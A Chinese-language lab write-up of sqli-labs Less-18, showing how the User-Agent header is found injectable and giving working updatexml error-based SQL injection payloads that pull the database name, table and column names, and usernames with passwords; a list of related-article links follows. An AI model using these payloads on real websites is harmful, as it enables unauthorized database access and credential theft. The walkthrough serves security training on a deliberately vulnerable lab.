sqli-labs-Less-18自动化注入方法

sqli-labs 实验记录

Less-18

这一关使用sqlmap依旧无法得到相应的注入点,需要通过分析源码进行手动报错注入,且注入点与之前的关卡不同,为user-agent。

第一步:分析源码,查找注入点

分析下图源码中函数check_input发现,函数对输入的数据进行了过滤,主要进行三种过滤:

  • 一是substr():截取前20个字符;
  • 二是stripslashes():过滤转义字符'\';
  • 三是mysql_real_escape_string():为非数字类型的数据添加" ' '",转为字符串。

既然源码对于用户输入的数据进行了过滤处理,我们主要考虑两种思路:一是对于过滤函数进行绕过;二是找到新的注入点。这里我们采用第二种方式,查找新的注入点。

结合上一关爆出的数据,在用户与密码栏中分别输入正确与错误的数据:uname=Dumb passwd=12 与passwd=Dumb

结果如图如示:在密码正确的页面返回了Your User Agent is: ......,密码错误的页面无任何回显。因此,我们考虑在User Agent这一点进行报错注入。

第二步:查询服务器中的所有数据库

使用hackbar插件,在user-agent注入点输入字符串:

复制代码
1' and updatexml(1,concat(0x7e,database(),0x7e),1) or '

updatexml 为报错注入函数。

查询结果如图所示:显示当前数据库为'security'。

第三步:查询指定数据库中的所有表

继续使用hackbar插件,在user-agent注入点输入字符串:

复制代码
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) or '

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的所有列

继续使用hackbar插件,在user-agent注入点输入字符串:

复制代码
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) or '

查询结果如图所示:数据列共有3个,分别是id,username,password。

第五步:查询指定数据表中的具体信息

继续使用hackbar插件,在user-agent注入点输入字符串:

复制代码
1' and updatexml(1,concat(0x7e,(select concat(username,':',password) from security.users limit 0,1),0x7e),1) or '

结果如图所示:查询出一条数据,用户名为Dumb,密码为12。

如果需要继续查找其它数据,只需将"limit 0,1"中的'0',进行相应的修改,如"limit 1,1","limit 2,1"等等。

相关推荐
HUGu RGIN7 小时前
MySQL--》如何在MySQL中打造高效优化索引
android·mysql·adb
HackTwoHub8 小时前
AI大模型网关存在SQL注入、附 POC 复现、影响版本LiteLLM 1.81.16~1.83.7(CVE-2026-42208)
数据库·人工智能·sql·网络安全·系统安全·网络攻击模型·安全架构
其实防守也摸鱼9 小时前
CTF密码学综合教学指南--第五章
开发语言·网络·笔记·python·安全·网络安全·密码学
挖AI金矿11 小时前
(十三)多Agent协同
自动化·个人开发·ai编程·hermes agent·爱马仕agent
HackTwoHub12 小时前
全新 AI 赋能网安平台 基于 Mitmproxy 流量分析自动化资产挖、轻量化综合渗透工具箱
人工智能·web安全·网络安全·系统安全·安全架构·sql注入
易生一世13 小时前
自动化Pipeline中的Kiro CLI详解
自动化·pipeline·key·headless·kiro
DevilSeagull14 小时前
MySQL(2) 客户端工具和建库
开发语言·数据库·后端·mysql·服务
HackTwoHub14 小时前
Linux 内核史诗级本地提权 全网深度复现、原理完整分析( CVE-2026-31431)
linux·运维·安全·web安全·网络安全·代码审计·安全架构
远洪15 小时前
claude code 国内安装使用
数据库·mysql
薛定猫AI16 小时前
【深度解析】Kimi K2.6 的长上下文 Agentic Coding 能力与 OpenAI 兼容 API 接入实践
人工智能·自动化·知识图谱